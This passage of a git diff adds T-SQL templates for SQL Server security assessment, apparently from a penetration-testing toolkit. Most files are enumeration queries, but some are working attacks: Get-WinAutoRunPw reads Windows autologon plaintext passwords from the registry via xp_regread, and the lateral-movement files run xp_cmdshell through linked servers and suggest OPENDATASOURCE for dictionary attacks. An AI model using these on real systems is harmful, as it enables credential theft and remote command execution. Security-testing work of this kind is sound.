msdb.dbo.syspolicy_target_sets t + ON t.object_set_id = p.object_set_id diff --git a/templates/tsql/Get-SQLServerLinkHistory.sql b/templates/tsql/Get-SQLServerLinkHistory.sql new file mode 100644 index 0000000..474bc06 --- /dev/null +++ b/templates/tsql/Get-SQLServerLinkHistory.sql @@ -0,0 +1,37 @@ +/* +Script: +Get-SQLServerLinkHistory + +Goal: +Identify linked server usage by qurying the plan cache. + +Potential Solution: +You can modify the query below to identify openquery, openrowset and specific link name usage (would require appending names to query). +However, I still need a solution for four part named references. + +Requiremets: +Sysadmin or required SELECT privileges. + +Known limitations: + - If linked server is used via view/function it may not appear in your result set. In these instances you would have to search the + source code for link name references in functions/views, then search the plan cache for those function/views. + - It will only include any sql that is in the plan cache. + - The plan cache is cleared on restart. + - SQL Server will clear out old plans from the cache once it's size limits are reached (can we check when it was last cleared?) + +Source: +https://dba.stackexchange.com/questions/5519/determine-last-usage-date-of-a-linked-server +*/ + +SELECT + (SELECT TOP 1 SUBSTRING(s2.text,statement_start_offset / 2+1 , + ( (CASE WHEN statement_end_offset = -1 + THEN (LEN(CONVERT(nvarchar(max),s2.text)) * 2) + ELSE statement_end_offset END) - statement_start_offset) / 2+1)) + AS sql_statement, + last_execution_time +FROM sys.dm_exec_query_stats AS s1 + CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s2 +WHERE s2.text like '%openquery%' or s2.text like '%openrowset)' +ORDER BY + s1.sql_handle, s1.statement_start_offset, s1.statement_end_offset diff --git a/templates/tsql/Get-SQLStoredProcedureCLR.sql b/templates/tsql/Get-SQLStoredProcedureCLR.sql new file mode 100644 index 0000000..f5f77bd --- /dev/null +++ b/templates/tsql/Get-SQLStoredProcedureCLR.sql @@ -0,0 +1,26 @@ +-- Use this to list out CLR stored procedure information +-- This is a modified version of code found at +-- https://stackoverflow.com/questions/3155542/sql-server-how-to-list-all-clr-functions-procedures-objects-for-assembly +USE msdb; +SELECT SCHEMA_NAME(so.[schema_id]) AS [schema_name], + af.file_id, + af.name + '.dll' as [file_name], + asmbly.clr_name, + asmbly.assembly_id, + asmbly.name AS [assembly_name], + am.assembly_class, + am.assembly_method, + so.object_id as [sp_object_id], + so.name AS [sp_name], + so.[type] as [sp_type], + asmbly.permission_set_desc, + asmbly.create_date, + asmbly.modify_date, + af.content +FROM sys.assembly_modules am +INNER JOIN sys.assemblies asmbly +ON asmbly.assembly_id = am.assembly_id +INNER JOIN sys.assembly_files af +ON asmbly.assembly_id = af.assembly_id +INNER JOIN sys.objects so +ON so.[object_id] = am.[object_id] diff --git a/templates/tsql/Get-SQLStoredProcedureXp.sql b/templates/tsql/Get-SQLStoredProcedureXp.sql new file mode 100644 index 0000000..1132a7c --- /dev/null +++ b/templates/tsql/Get-SQLStoredProcedureXp.sql @@ -0,0 +1,32 @@ +/* + Script: Get-SQLStoredProcedureXP.sql + Description: This will list the custom exteneded stored procedures for the current database. + Author: Scott Sutherland, 2017 +*/ + +SELECT o.object_id, + o.parent_object_id, + o.schema_id, + o.type, + o.type_desc, + o.name, + o.principal_id, + s.text, + s.ctext, + s.status, + o.create_date, + o.modify_date, + o.is_ms_shipped, + o.is_published, + o.is_schema_published, + s.colid, + s.compressed, + s.encrypted, + s.id, + s.language, + s.number, + s.texttype +FROM sys.objects o +INNER JOIN sys.syscomments s + ON o.object_id = s.id +WHERE o.type = 'x' diff --git a/templates/tsql/Get-Schema b/templates/tsql/Get-Schema new file mode 100644 index 0000000..93694ab --- /dev/null +++ b/templates/tsql/Get-Schema @@ -0,0 +1,9 @@ + +SELECT * +FROM information_schema.schemata + + +SELECT s.Name, u.* +FROM sys.schemas s + INNER JOIN sys.sysusers u + ON u.uid = s.principal_id diff --git a/templates/tsql/Get-Schema.sql b/templates/tsql/Get-Schema.sql new file mode 100644 index 0000000..b3a6994 --- /dev/null +++ b/templates/tsql/Get-Schema.sql @@ -0,0 +1,9 @@ +-- Script: Get-Schema.sql +-- Description: Return list of schemas for the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms182642.aspx + +SELECT CATALOG_NAME AS [DATABASE_NAME], + SCHEMA_NAME, + SCHEMA_OWNER +FROM [INFORMATION_SCHEMA].[SCHEMATA] +ORDER BY SCHEMA_NAME \ No newline at end of file diff --git a/templates/tsql/Get-ServerAudit.sql b/templates/tsql/Get-ServerAudit.sql new file mode 100644 index 0000000..3dfd924 --- /dev/null +++ b/templates/tsql/Get-ServerAudit.sql @@ -0,0 +1,10 @@ +-- Script: Get-ServerAudit.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: List server audit specifications. +-- Reference: https://msdn.microsoft.com/en-us/library/cc280727.aspx + +SELECT * FROM sys.server_audits AS a +JOIN sys.server_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.server_audit_specification_details AS d +ON s.server_specification_id = d.server_specification_id diff --git a/templates/tsql/Get-ServerCertLogin.sql b/templates/tsql/Get-ServerCertLogin.sql new file mode 100644 index 0000000..b9c6ad0 --- /dev/null +++ b/templates/tsql/Get-ServerCertLogin.sql @@ -0,0 +1,8 @@ +-- Script: Get-ServerCertLogin.sql +-- Description: Return a list of server logins created from a certificate. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188786.aspx + +SELECT * +FROM [sys].[server_principals] +WHERE type = 'C' + \ No newline at end of file diff --git a/templates/tsql/Get-ServerConfiguration.sql b/templates/tsql/Get-ServerConfiguration.sql new file mode 100644 index 0000000..539c515 --- /dev/null +++ b/templates/tsql/Get-ServerConfiguration.sql @@ -0,0 +1,5 @@ +-- Script: Get-ServerConfiguration.sql +-- Description: Return list of server configurations. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188345.aspx + +SELECT * FROM [sys].[configurations] \ No newline at end of file diff --git a/templates/tsql/Get-ServerLink.sql b/templates/tsql/Get-ServerLink.sql new file mode 100644 index 0000000..015924a --- /dev/null +++ b/templates/tsql/Get-ServerLink.sql @@ -0,0 +1,46 @@ +-- Script: Get-ServerLink.sql +-- Decription: Return a list of SQL Server links and their properties. +-- Reference: https://msdn.microsoft.com/en-us/library/ms178530.aspx +-- Note: Use open query or four part names to query links + +SELECT a.server_id, + a.name AS [DATABASE_LINK_NAME], + CASE a.Server_id + WHEN 0 + THEN 'Current' + ELSE 'Remote' + END AS [DATABASE_LINK_LOCATION], + a.product, + a.provider, + a.catalog, + 'Local Login ' = CASE b.uses_self_credential + WHEN 1 THEN 'Uses Self Credentials' + ELSE c.name + END, + b.remote_name AS [REMOTE LOGIN NAME], + a.is_rpc_out_enabled, + a.is_data_access_enabled, + a.modify_date +FROM [sys].[Servers] a +LEFT JOIN [sys].[linked_logins] b + ON a.server_id = b.server_id +LEFT JOIN [sys].[server_principals] c + ON c.principal_id = b.local_principal_id + +-- Alternative Options + +sp_linkedservers +select * from master..sysservers +select * from master.dbo.sysservers +select * from master.sys.servers +select * from FROM master.sys.sysxsrvs -- This is a system base table and can only be accessed via a dedicated administrator connection (DAC) with a sysadmin login. + + + + + + + + + + diff --git a/templates/tsql/Get-ServerLogin.sql b/templates/tsql/Get-ServerLogin.sql new file mode 100644 index 0000000..2cdec5e --- /dev/null +++ b/templates/tsql/Get-ServerLogin.sql @@ -0,0 +1,13 @@ +-- Script: Get-ServerLogin.sql +-- Description: Get list of logins for the server. To view all +-- logins the user must be a sysadmin. Unless bruteforced. +-- Reference: http://msdn.microsoft.com/en-us/library/ms345412.aspx + +SELECT name, + principal_id, + sid, + type, + type_desc, + create_date, + LOGINPROPERTY ( name , 'IsLocked' ) AS [is_locked] +FROm [sys].[server_principals] \ No newline at end of file diff --git a/templates/tsql/Get-ServerPriv.sql b/templates/tsql/Get-ServerPriv.sql new file mode 100644 index 0000000..9266f5f --- /dev/null +++ b/templates/tsql/Get-ServerPriv.sql @@ -0,0 +1,30 @@ +-- Script: Get-ServerPriv.sql +-- Description: list all server principals with their permissions on server level. +-- This Transact-SQL script list all server principals with their permissions on +-- server level to give a quick overview of security. For given permissions on +-- server object like endpoints or impersonate other login it returns also the +-- object / login etc name.Works with SQL Server 2005 and higher versions in all editions. +-- Lists only object where the executing user do have VIEW METADATA permissions for. +-- Reference: http://msdn.microsoft.com/en-us/library/ms186260.aspx +-- Note: This line below will also show full privs for sysadmin users +-- SELECT * FROM fn_my_permissions(NULL, 'SERVER'); + +SELECT GRE.name AS Grantee + ,GRO.name AS Grantor + ,PER.class_desc AS PermClass + ,PER.permission_name AS PermName + ,PER.state_desc AS PermState + ,COALESCE(PRC.name, EP.name, N'') AS ObjectName + ,COALESCE(PRC.type_desc, EP.type_desc, N'') AS ObjectType +FROM [sys].[server_permissions] AS PER + INNER JOIN sys.server_principals AS GRO + ON PER.grantor_principal_id = GRO.principal_id + INNER JOIN sys.server_principals AS GRE + ON PER.grantee_principal_id = GRE.principal_id + LEFT JOIN sys.server_principals AS PRC + ON PER.class = 101 + AND PER.major_id = PRC.principal_id + LEFT JOIN sys.endpoints AS EP + ON PER.class = 105 + AND PER.major_id = EP.endpoint_id +ORDER BY Grantee,PermName; \ No newline at end of file diff --git a/templates/tsql/Get-ServerRole.sql b/templates/tsql/Get-ServerRole.sql new file mode 100644 index 0000000..0a956c9 --- /dev/null +++ b/templates/tsql/Get-ServerRole.sql @@ -0,0 +1,18 @@ +-- Script: Get-ServerRole.sql +-- Description: Return security principals and server roles. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188786.aspx + +SELECT sp.name AS LoginName, + sp.type_desc AS LoginType, + sp.default_database_name AS DefaultDBName, + slog.sysadmin AS SysAdmin, + slog.securityadmin AS SecurityAdmin, + slog.serveradmin AS ServerAdmin, + slog.setupadmin AS SetupAdmin, + slog.processadmin AS ProcessAdmin, + slog.diskadmin AS DiskAdmin, + slog.dbcreator AS DBCreator, + slog.bulkadmin AS BulkAdmin +FROM [sys].[server_principals] sp +JOIN [master].[dbo].[syslogins] slog +ON sp.sid = slog.sid \ No newline at end of file diff --git a/templates/tsql/Get-ServiceAccount.sql b/templates/tsql/Get-ServiceAccount.sql new file mode 100644 index 0000000..2a01f73 --- /dev/null +++ b/templates/tsql/Get-ServiceAccount.sql @@ -0,0 +1,86 @@ +-- Script: Get-ServiceAccount.sql +-- Description: Return the service accounts running the major database services. + +-- Setup variables +DECLARE @SQLServerInstance VARCHAR(250) +DECLARE @MSOLAPInstance VARCHAR(250) +DECLARE @ReportInstance VARCHAR(250) +DECLARE @AgentInstance VARCHAR(250) +DECLARE @IntegrationVersion VARCHAR(250) +DECLARE @DBEngineLogin VARCHAR(100) +DECLARE @AgentLogin VARCHAR(100) +DECLARE @BrowserLogin VARCHAR(100) +DECLARE @WriterLogin VARCHAR(100) +DECLARE @AnalysisLogin VARCHAR(100) +DECLARE @ReportLogin VARCHAR(100) +DECLARE @IntegrationDtsLogin VARCHAR(100) + +-- Get Service Paths for default and name instance +if @@SERVICENAME = 'MSSQLSERVER' or @@SERVICENAME = HOST_NAME() +BEGIN + -- Default instance paths + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLServerOLAPService' + set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer' + set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT' + set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' +END +ELSE +BEGIN + -- Named instance paths + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$' + cast(@@SERVICENAME as varchar(250)) + set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSOLAP$' + cast(@@SERVICENAME as varchar(250)) + set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer$' + cast(@@SERVICENAME as varchar(250)) + set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLAgent$' + cast(@@SERVICENAME as varchar(250)) + set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' +END + +-- Get SQL Server - Calculated +EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@DBEngineLogin OUTPUT + +-- Get SQL Server Agent - Calculated +EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @AgentInstance, + N'ObjectName',@AgentLogin OUTPUT + +-- Get SQL Server Browser - Static Location +EXECUTE master.dbo.xp_instance_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Services\SQLBrowser', + @value_name = N'ObjectName', + @value = @BrowserLogin OUTPUT + +-- Get SQL Server Writer - Static Location +EXECUTE master.dbo.xp_instance_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Services\SQLWriter', + @value_name = N'ObjectName', + @value = @WriterLogin OUTPUT + +-- Get MSOLAP - Calculated +EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @MSOLAPInstance, + N'ObjectName',@AnalysisLogin OUTPUT + +-- Get Reporting - Calculated +EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @ReportInstance, + N'ObjectName',@ReportLogin OUTPUT + +-- Get SQL Server DTS Server / Analysis - Calulated +EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @IntegrationVersion, + N'ObjectName',@IntegrationDtsLogin OUTPUT + +-- Dislpay results +SELECT [DBEngineLogin] = @DBEngineLogin, + [BrowserLogin] = @BrowserLogin, + [AgentLogin] = @AgentLogin, + [WriterLogin] = @WriterLogin, + [AnalysisLogin] = @AnalysisLogin, + [ReportLogin] = @ReportLogin, + [IntegrationLogin] = @IntegrationDtsLogin +GO + diff --git a/templates/tsql/Get-Session.sql b/templates/tsql/Get-Session.sql new file mode 100644 index 0000000..d04165a --- /dev/null +++ b/templates/tsql/Get-Session.sql @@ -0,0 +1,14 @@ +-- Script: Get-Session.sql +-- Description: Get current login sessions. +-- Reference: https://msdn.microsoft.com/en-us/library/ms176013.aspx + +SELECT + status, + session_id, + login_time, + last_request_start_time, + security_id, + login_name, + original_login_name +FROM [sys].[dm_exec_sessions] +ORDER BY status \ No newline at end of file diff --git a/templates/tsql/Get-SqlLogin2PrincipalID.sql b/templates/tsql/Get-SqlLogin2PrincipalID.sql new file mode 100644 index 0000000..e070ad8 --- /dev/null +++ b/templates/tsql/Get-SqlLogin2PrincipalID.sql @@ -0,0 +1,10 @@ +-- Script: Get-SqlLogin2PrincipalId.sql +-- Description: Example showing how to get the principal id for a +-- for a give sql server login. +-- Reference: https://msdn.microsoft.com/en-us/library/ms179889.aspx + +SELECT SUSER_NAME(1) +SELECT SUSER_NAME(2) +SELECT SUSER_NAME(3) +SELECT SUSER_NAME(4) +SELECT SUSER_NAME(5) diff --git a/templates/tsql/Get-Table.sql b/templates/tsql/Get-Table.sql new file mode 100644 index 0000000..9e45137 --- /dev/null +++ b/templates/tsql/Get-Table.sql @@ -0,0 +1,26 @@ +-- Script: Get-Table.sql +-- Description: Returns a list of tables for the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms186224.aspx + +SELECT + @@SERVERNAME AS [INSTANCE_NAME], + t.TABLE_CATALOG AS [DATABASE_NAME], + t.TABLE_SCHEMA AS [SCHEMA_NAME], + t.TABLE_NAME, + CASE + WHEN (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t.TABLE_NAME LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t.TABLE_NAME NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE t.TABLE_TYPE + END AS Table_Type, + st.is_ms_shipped, + st.is_published, + st.is_schema_published, + st.create_date, + st.modify_date AS modified_date +FROM [INFORMATION_SCHEMA].[TABLES] t +JOIN sys.tables st ON t.TABLE_NAME = st.name AND t.TABLE_SCHEMA = OBJECT_SCHEMA_NAME(st.object_id) +JOIN sys.objects s ON st.object_id = s.object_id +LEFT JOIN sys.extended_properties ep ON s.object_id = ep.major_id + AND ep.minor_id = 0 +ORDER BY t.TABLE_CATALOG, t.TABLE_SCHEMA, t.TABLE_NAME; diff --git a/templates/tsql/Get-TablePriv.sql b/templates/tsql/Get-TablePriv.sql new file mode 100644 index 0000000..0d46388 --- /dev/null +++ b/templates/tsql/Get-TablePriv.sql @@ -0,0 +1,13 @@ +-- Script: Get-TablePriv.sql +-- Description: Returns a list of explicit table privileges for the +-- current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms186233.aspx + +SELECT GRANTOR, + GRANTEE, + TABLE_CATALOG AS [DATABASE_NAME], + TABLE_SCHEMA AS [SCHEMA_NAME], + TABLE_NAME, + PRIVILEGE_TYPE, + IS_GRANTABLE +FROM [INFORMATION_SCHEMA].[TABLE_PRIVILEGES] \ No newline at end of file diff --git a/templates/tsql/Get-TempObject.sql b/templates/tsql/Get-TempObject.sql new file mode 100644 index 0000000..29de25c --- /dev/null +++ b/templates/tsql/Get-TempObject.sql @@ -0,0 +1,5 @@ +-- Script: Get-TempObject.sql +-- Description: Return list of object in the tempdb database. +-- Reference: https://technet.microsoft.com/en-us/library/ms186986%28v=sql.105%29.aspx + +SELECT * FROM [tempdb].[sys].[objects] \ No newline at end of file diff --git a/templates/tsql/Get-TempTableColumns.sql b/templates/tsql/Get-TempTableColumns.sql new file mode 100644 index 0000000..eb8bdb5 --- /dev/null +++ b/templates/tsql/Get-TempTableColumns.sql @@ -0,0 +1,25 @@ +-- Script: Get-TempTableColumns.sql +-- Author: Scott Sutherland +-- Description: Return a list of all temp table types. +-- Include table variables, local temp tables, and global temp tables. + +SELECT 'tempdb' as 'Database_Name', + SCHEMA_NAME(t1.schema_id) AS 'Schema_Name', + t1.name AS 'Table_Name', + t2.name AS 'Column_Name', + t3.name AS 'Column_Type', + CASE + WHEN (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t1.name LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t1.name NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE NULL + END AS Table_Type, + t1.is_ms_shipped, + t1.is_published, + t1.is_schema_published, + t1.create_date, + t1.modify_date +FROM [tempdb].[sys].[objects] AS t1 +JOIN [tempdb].[sys].[columns] AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID +JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id +WHERE t1.name LIKE '#%' diff --git a/templates/tsql/Get-TriggerDDL.sql b/templates/tsql/Get-TriggerDDL.sql new file mode 100644 index 0000000..e9c0e19 --- /dev/null +++ b/templates/tsql/Get-TriggerDDL.sql @@ -0,0 +1,13 @@ +-- Script: Get-TriggerDDL.sql +-- Description: Return list of DDL triggers at the server level. +-- This must be run with the master database select to get the trigger definition. + +SELECT name, + OBJECT_DEFINITION(OBJECT_ID) as trigger_definition, + parent_class_desc, + create_date, + modify_date, + is_ms_shipped, + is_disabled +FROM sys.server_triggers + diff --git a/templates/tsql/Get-TriggerDML.sql b/templates/tsql/Get-TriggerDML.sql new file mode 100644 index 0000000..b2d5c78 --- /dev/null +++ b/templates/tsql/Get-TriggerDML.sql @@ -0,0 +1,26 @@ +-- Script: Get-TriggerDML.sql +-- Return list of DML triggers at the database level for the current database. + +SELECT @@SERVERNAME as server_name, + (SELECT TOP 1 SCHEMA_NAME(schema_id)FROM sys.objects WHERE type ='tr' and object_id like object_id ) as schema_id , + DB_NAME() as database_name, + OBJECT_NAME(parent_id) as parent_name, + OBJECT_NAME(object_id) as trigger_name, + OBJECT_DEFINITION(object_id) as trigger_definition, + OBJECT_ID, + create_date, + modify_date, + CASE OBJECTPROPERTY(object_id, 'ExecIsTriggerDisabled') + WHEN 1 THEN 'Disabled' + ELSE 'Enabled' + END AS status, + OBJECTPROPERTY(object_id, 'ExecIsUpdateTrigger') AS isupdate , + OBJECTPROPERTY(object_id, 'ExecIsDeleteTrigger') AS isdelete , + OBJECTPROPERTY(object_id, 'ExecIsInsertTrigger') AS isinsert , + OBJECTPROPERTY(object_id, 'ExecIsAfterTrigger') AS isafter , + OBJECTPROPERTY(object_id, 'ExecIsInsteadOfTrigger') AS isinsteadof , + is_ms_shipped, + is_not_for_replication +FROM sys.triggers + + diff --git a/templates/tsql/Get-TriggerEventType.sql b/templates/tsql/Get-TriggerEventType.sql new file mode 100644 index 0000000..a8e22f4 --- /dev/null +++ b/templates/tsql/Get-TriggerEventType.sql @@ -0,0 +1,8 @@ +-- Script: Get-TriggerEventType.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns trigger event types. +-- Reference: https://msdn.microsoft.com/en-us/library/bb522542.aspx + +SELECT * +FROM sys.trigger_event_types +ORDER BY TYPE_NAME diff --git a/templates/tsql/Get-TriggerEventTypes.sql b/templates/tsql/Get-TriggerEventTypes.sql new file mode 100644 index 0000000..ba86c7e --- /dev/null +++ b/templates/tsql/Get-TriggerEventTypes.sql @@ -0,0 +1,8 @@ +-- Script: Get-TriggerEventTypes.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns DDL event trigger types. +-- Reference: https://msdn.microsoft.com/en-us/library/bb510452.aspx +-- Reference: https://msdn.microsoft.com/en-us/library/bb522542.aspx +-- REference: https://msdn.microsoft.com/en-us/library/bb510453.aspx + +SELECT * FROM sys.trigger_event_types diff --git a/templates/tsql/Get-Version.sql b/templates/tsql/Get-Version.sql new file mode 100644 index 0000000..b9c86f4 --- /dev/null +++ b/templates/tsql/Get-Version.sql @@ -0,0 +1,30 @@ +-- Description: Return SQL Server and OS version information. +-- Reference: https://msdn.microsoft.com/en-us/library/ms174396.aspx + +-- Get machine type +DECLARE @MachineType SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', +@value_name = N'ProductType', +@value = @MachineType output + +-- Get listening port +Declare @PortNumber varchar(20) +EXECUTE master..xp_regread +@rootkey = 'HKEY_LOCAL_MACHINE', +@key = 'SOFTWARE\MICROSOFT\MSSQLServer\MSSQLServer\Supersocketnetlib\TCP', +@value_name = 'Tcpport', +@value = @PortNumber OUTPUT + +-- Return server and version information +SELECT @@servername AS [SERVER_INSTANCE], + @PortNumber AS [TCP_PORT], + DEFAULT_DOMAIN() AS [DEFAULT_DOMAIN], + SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) AS [MAJOR_VERSION], + serverproperty('Edition') AS [VERSION_EDITION], + SERVERPROPERTY('ProductLevel') AS [PRODUCT_LEVEL], + SERVERPROPERTY('productversion') AS [VERSION_NUMBER], + SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) AS [ARCHITECTURE], + @MachineType as [OS_MACHINE_TYPE], + RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) AS [OS_VERSION_NUMBER] \ No newline at end of file diff --git a/templates/tsql/Get-View.sql b/templates/tsql/Get-View.sql new file mode 100644 index 0000000..c9f6195 --- /dev/null +++ b/templates/tsql/Get-View.sql @@ -0,0 +1,12 @@ +-- Script: Get-View.sql +-- Description: This script returns a list of view +-- from the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms186778.aspx + +SELECT TABLE_CATALOG AS [DATABASE_NAME], + TABLE_SCHEMA AS [SCHEMA_NAME], + TABLE_NAME, + VIEW_DEFINITION, + IS_UPDATABLE +FROM [INFORMATION_SCHEMA].[VIEWS] +ORDER BY DATABASE_NAME,SCHEMA_NAME,TABLE_NAME \ No newline at end of file diff --git a/templates/tsql/Get-WinAccount2SID.sql b/templates/tsql/Get-WinAccount2SID.sql new file mode 100644 index 0000000..b00734b --- /dev/null +++ b/templates/tsql/Get-WinAccount2SID.sql @@ -0,0 +1,10 @@ +-- Script: Get-WinAccount2SID.sql +-- Description: Example showing how to get the SID of +-- of a supplied domain user or group. Note that the SID is hex encoded. +-- Reference: https://msdn.microsoft.com/en-us/library/ms179889.aspx + +DECLARE @DOMAIN_ADMINISTRATOR varchar(100) +DECLARE @CMD varchar(100) +SET @DOMAIN_ADMINISTRATOR = default_domain() + '\Domain Admins' +SET @CMD = 'select SUSER_SID(''' + @DOMAIN_ADMINISTRATOR + ''')' +EXEC(@CMD) diff --git a/templates/tsql/Get-WinAutoRunPw.tsql b/templates/tsql/Get-WinAutoRunPw.tsql new file mode 100644 index 0000000..3e65279 --- /dev/null +++ b/templates/tsql/Get-WinAutoRunPw.tsql @@ -0,0 +1,66 @@ +-- Get the Windows auto login credentials through SQL Server using xp_regread +-- Requirements +-- 2014 or later = sysadmin +-- 2000 to 2012 = public role with execute privs on xp_regread (default) + +------------------------------------------------------------------------- +-- Get Windows Auto Login Credentials from the Registry +------------------------------------------------------------------------- + +-- Get AutoLogin Default Domain +DECLARE @AutoLoginDomain SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'DefaultDomainName', +@value = @AutoLoginDomain output + +-- Get AutoLogin DefaultUsername +DECLARE @AutoLoginUser SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'DefaultUserName', +@value = @AutoLoginUser output + +-- Get AutoLogin DefaultUsername +DECLARE @AutoLoginPassword SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'DefaultPassword', +@value = @AutoLoginPassword output + +-- Display Results +SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword + +------------------------------------------------------------------------- +-- Get Alternative Windows Auto Login Credentials from the Registry +------------------------------------------------------------------------- + +-- Get Alt AutoLogin Default Domain +DECLARE @AltAutoLoginDomain SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'AltDefaultDomainName', +@value = @AltAutoLoginDomain output + +-- Get Alt AutoLogin DefaultUsername +DECLARE @AltAutoLoginUser SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'AltDefaultUserName', +@value = @AltAutoLoginUser output + +-- Get Alt AutoLogin DefaultUsername +DECLARE @AltAutoLoginPassword SYSNAME +EXECUTE master.dbo.xp_regread +@rootkey = N'HKEY_LOCAL_MACHINE', +@key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', +@value_name = N'AltDefaultPassword', +@value = @AltAutoLoginPassword output + +-- Display Results +SELECT @AltAutoLoginDomain, @AltAutoLoginUser, @AltAutoLoginPassword diff --git a/templates/tsql/Lateral-Movement-Existing-Links.sql b/templates/tsql/Lateral-Movement-Existing-Links.sql new file mode 100644 index 0000000..1bd7615 --- /dev/null +++ b/templates/tsql/Lateral-Movement-Existing-Links.sql @@ -0,0 +1,24 @@ + +-- List linked servers +sp_linkeservers +SELECT srvname FROM master..sysservers + +-- Query an existing link using multipart name +select name FROM [linkedserver].master.sys.databases + +-- Query an existing link using openquery +SELECT version FROM openquery("linkedserver", 'select @@version as version'); +SELECT * FROM openquery(Server1, 'select @@servername') +SELECT * FROM openquery(Server1, 'select SYSTEM_USER') +SELECT * FROM OPENQUERY("server1",'SELECT is_srvrolemember(''sysadmin'')') +SELECT * FROM OPENQUERY("server1",'SELECT srvname FROM master..sysservers') + +-- Query a nested link +-- Note: double number of ' with each nesting +select version from openquery("link1",'select version from openquery("link2",''select @@version as version'')') + +-- Execute xp_cmdshell through a link +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell ''dir c:''') + +-- If needed, enabled xp_cmdshell on link (requires link to be configured with sysadmin) +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer diff --git a/templates/tsql/Lateral-Movement-OpenDataSourceBF.tsql b/templates/tsql/Lateral-Movement-OpenDataSourceBF.tsql new file mode 100644 index 0000000..ac6a4ec --- /dev/null +++ b/templates/tsql/Lateral-Movement-OpenDataSourceBF.tsql @@ -0,0 +1,8 @@ +-- https://msdn.microsoft.com/en-us/library/ms179856.aspx +-- This could potentially be used for a dictionary attack inline +-- Note: This format also supports the four part naming. +SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;').master.dbo.sysdatabases +SELECT * FROM OPENDATASOURCE('SQLNCLI', 